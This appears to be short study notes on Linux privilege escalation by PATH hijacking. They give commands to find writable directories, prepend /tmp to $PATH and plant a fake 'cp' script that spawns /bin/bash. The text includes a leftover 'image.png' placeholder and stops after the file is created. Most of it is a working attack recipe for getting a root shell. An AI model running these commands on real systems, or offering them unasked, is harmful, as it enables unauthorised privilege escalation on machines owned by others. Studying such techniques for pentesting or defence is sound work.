PATH

we start to know all paths are stored

image.png

then we want to know what are folder is writable

find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u

we compare if any writable folder is path or not if not found we try to add this folder in $PATH

export PATH=/tmp:$PATH
# replace /tmp to your path

then we will create a malicious file

echo -e '#!/bin/bash\n/bin/bash' > /tmp/cp
chmod +x /tmp/cp